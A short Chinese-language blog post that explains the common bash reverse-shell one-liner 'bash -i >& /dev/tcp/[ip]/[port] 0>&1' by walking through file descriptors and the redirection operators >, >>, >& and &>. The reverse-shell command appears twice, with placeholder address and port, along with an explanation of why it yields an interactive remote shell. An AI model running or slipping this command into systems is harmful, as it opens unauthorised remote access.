前言
今天看到在Linux中反弹shell时,对常用的反弹shell语句产生了好奇。
bash -i >& /dev/tcp/[ip]/[port] 0>&1
其实理解它最关键的地方还是在与对于几个看上去相似的符号的理解。
我写下来对于它们的看法,不对的地方请大家帮忙斧正。
文件描述符
有三种标准的文件描述符:
0 - stdin 标准输入
1 - stdout 标准输出
2 - stderr 标准错误输出
还可以自己定义文件描述符,可以用于交换输出流。详见:https://unix.stackexchange.com/questions/42728/what-does-31-12-23-do-in-a-script?lq=1
>与>>
>用于将标准输出重定向至文件。
ls -l > result.txt //结果将在文件中保存而不出现在bash中
>>和>相比的区别在于:>是覆写文件而>>是追加文件。
>&与&>
>&根据后面的参数不同会有不同的结果。
- 当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
- 当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符
一定注意:要使用>&来进行文件描述符的重定向
我看到很多博文中说>&和&>是一样的,但是查找不出来&>的相关资料,我认为应该是因为&>在一起并不像>&一样是一个标准的表达方式。
下面证明&>与>&并不相同。
rm notExist.file1 > result.txt 2>&1
//结果将被保存在result.txt
rm notExist.file1 > result.txt 2&>1
//2与notExist.file1都被认为是要删除的文件
//结果保存在了一个文件1中
截图:
再谈对于反弹shell语句的理解
有了上面的介绍,再看反弹shell的语句就简单多了。
bash -i >& /dev/tcp/[ip]/[port] 0>&1
- bash -i 打开bash
- >&后面跟 /dev/tcp/[ip]/[port] (相当于>&后面接文件)将bash的标准输出和标准错误输出传递到远程。
- 0>&1将标准输入重定向至标准输出,由于标准输出定向至远程,标准输入也借此定向到远程。(由于标准错误输出也定向至远程,因此把 0>&1 改为 0>&2 也可以得到一个交互shell)